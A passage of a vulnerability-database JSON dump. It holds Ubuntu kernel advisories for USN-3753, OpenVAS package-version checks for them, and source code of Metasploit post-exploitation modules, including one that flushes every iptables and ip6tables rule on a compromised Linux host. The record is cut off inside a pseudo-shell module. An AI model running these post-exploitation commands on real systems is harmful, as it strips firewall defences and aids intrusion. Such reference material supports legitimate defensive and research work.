[CVE-2018-13094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13094>)\n * [CVE-2018-13405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13405>)\n * [CVE-2018-13406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13406>)\n", "modified": "2018-09-11T00:00:00", "published": "2018-09-11T00:00:00", "id": "CFOUNDRY:CD984900F2B581632FB9816EFFC5EA33", "href": "https://www.cloudfoundry.org/blog/usn-3753-2/", "title": "USN-3753-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-08-25T00:00:00", "id": "OPENVAS:1361412562310843627", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843627", "title": "Ubuntu Update for linux USN-3753-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3753_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3753-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843627\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-25 06:47:37 +0200 (Sat, 25 Aug 2018)\");\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10879\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10882\", \"CVE-2018-10881\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3753-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use this\nto construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem\nimplementation in the Linux kernel. An attacker could use this to construct\na malicious ext4 image that, when mounted, could cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4 image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the\nLinux kernel contained a buffer overflow when handling extended attributes.\nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file\ncreation when performed by a non-member of the group. A local attacker\ncould use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the\nLinux kernel contained an integer overflow. A local attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-13406)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3753-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3753-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-kvm\", ver:\"4.4.0-1032.38\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1066-aws\", ver:\"4.4.0-1066.76\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1095-raspi2\", ver:\"4.4.0-1095.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1099-snapdragon\", ver:\"4.4.0-1099.104\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic-lpae\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-lowlatency\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-e500mc\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-smp\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-emb\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-smp\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1066.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1032.31\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1095.95\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1099.91\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-08-25T00:00:00", "id": "OPENVAS:1361412562310843626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843626", "title": "Ubuntu Update for linux-aws USN-3753-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3753_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3753-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843626\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-25 06:46:31 +0200 (Sat, 25 Aug 2018)\");\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10879\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10882\", \"CVE-2018-10881\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3753-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use this\nto construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem\nimplementation in the Linux kernel. An attacker could use this to construct\na malicious ext4 image that, when mounted, could cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4 image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the\nLinux kernel contained a buffer overflow when handling extended attributes.\nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file\ncreation when performed by a non-member of the group. A local attacker\ncould use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the\nLinux kernel contained an integer overflow. A local attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-13406)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3753-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3753-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1028-aws\", ver:\"4.4.0-1028.31\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic-lpae\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-lowlatency\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-e500mc\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-smp\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-emb\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-smp\", ver:\"4.4.0-134.160~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1028.28\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.134.114\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:53", "bulletinFamily": "unix", "description": "USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)", "modified": "2018-08-24T00:00:00", "published": "2018-08-24T00:00:00", "id": "USN-3753-2", "href": "https://usn.ubuntu.com/3753-2/", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:02", "bulletinFamily": "unix", "description": "It was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)", "modified": "2018-08-24T00:00:00", "published": "2018-08-24T00:00:00", "id": "USN-3753-1", "href": "https://usn.ubuntu.com/3753-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-27T01:17:10", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.\n", "modified": "2019-01-24T17:22:19", "published": "2018-08-14T16:31:16", "id": "MSF:POST/LINUX/GATHER/ENUM_COMMANDS", "href": "", "type": "metasploit", "title": "Testing commands needed in a function", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'Testing commands needed in a function',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. It will check which commands are available in the system.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n register_options(\n [\n OptString.new('DIR', [false, 'Optional directory name to list, default current session path',''])\n ])\n end\n\n DIRS = [\n \"/root/local/bin/\",\n \"/usr/local/sbin/\",\n \"/usr/local/bin/\",\n \"/usr/sbin/\",\n \"/usr/bin/\",\n \"/sbin/\",\n \"/bin/\",\n \"/usr/local/go/bin/\"\n ]\n\n def run\n dir = datastore['DIR']\n binaries = []\n\n # Explore the $PATH directories\n path_dirs = cmd_exec(\"echo $PATH\").split(':')\n path_dirs.each do |d|\n elems = dir(d)\n path = pwd()\n elems.each do |elem|\n binaries.insert(-1, \"#{d}/#{elem}\")\n end\n end\n\n # Explore common directories with binaries:\n DIRS.each do |d|\n# if dir_exist?(d)\n elems = dir(d)\n path = pwd()\n elems.each do |elem|\n binaries.insert(-1, \"#{d}#{elem}\")\n end\n end\n\n # Busybox commands\n if command_exists?(\"busybox\")\n output = cmd_exec(\"busybox\")\n busybox_cmds = output.split(':')[-1].chomp.split(',')\n busybox_cmds.each do |cmd|\n binaries.insert(-1, \"busybox #{cmd}\")\n print_good(\"busybox #{cmd}\")\n end\n elsif command_exists?(\"/bin/busybox\")\n output = cmd_exec(\"(bin/busybox\")\n end\n\n# A recursive ls through the whole system could be added to find extra binaries\n\n binaries.uniq\n binaries.sort\n\n print_good(\"The following binaries/commands are available\")\n binaries.each do |bin|\n print_line(\"#{bin}\")\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/enum_commands.rb"}, {"lastseen": "2019-11-26T05:15:45", "bulletinFamily": "exploit", "description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.\n", "modified": "2019-01-24T17:22:19", "published": "2018-07-12T12:16:22", "id": "MSF:POST/LINUX/MANAGE/IPTABLES_REMOVAL", "href": "", "type": "metasploit", "title": "IPTABLES rules removal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n\n def initialize\n super(\n 'Name' => 'IPTABLES rules removal',\n 'Description' => %q{\n This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n\n if command_exists?(\"iptables\")\n print_good(\"Deleting IPTABLES rules...\")\n cmd_exec(\"iptables -P INPUT ACCEPT\")\n cmd_exec(\"iptables -P FORWARD ACCEPT\")\n cmd_exec(\"iptables -P OUTPUT ACCEPT\")\n cmd_exec(\"iptables -t nat -F\")\n cmd_exec(\"iptables -t mangle -F\")\n cmd_exec(\"iptables -F\")\n cmd_exec(\"iptables -X\")\n print_good(\"iptables rules successfully executed\")\n else\n print_line(\"iptables rules could not be executed\")\n end\n if command_exists?(\"ip6tables\")\n print_good(\"Deleting IP6TABLES rules...\")\n cmd_exec(\"ip6tables -P INPUT ACCEPT\")\n cmd_exec(\"ip6tables -P FORWARD ACCEPT\")\n cmd_exec(\"ip6tables -P OUTPUT ACCEPT\")\n cmd_exec(\"ip6tables -t nat -F\")\n cmd_exec(\"ip6tables -t mangle -F\")\n cmd_exec(\"ip6tables -F\")\n cmd_exec(\"ip6tables -X\")\n print_good(\"ip6tables rules successfully executed\")\n else\n print_line(\"ip6tables rules could not be executed\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/manage/iptables_removal.rb"}, {"lastseen": "2019-10-22T12:04:47", "bulletinFamily": "exploit", "description": "This module will run a Pseudo-Shell.\n", "modified": "2019-01-24T17:22:19", "published": "2018-06-19T10:39:41", "id": "MSF:POST/LINUX/MANAGE/PSEUDO_SHELL", "href": "", "type": "metasploit", "title": "Pseudo-Shell Post-Exploitation Module", "sourceData": "\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'readline'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Unix\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Priv\n\nHELP_COMMANDS = [[\"help\", \"help\", 0, \"Show current help\"],\n 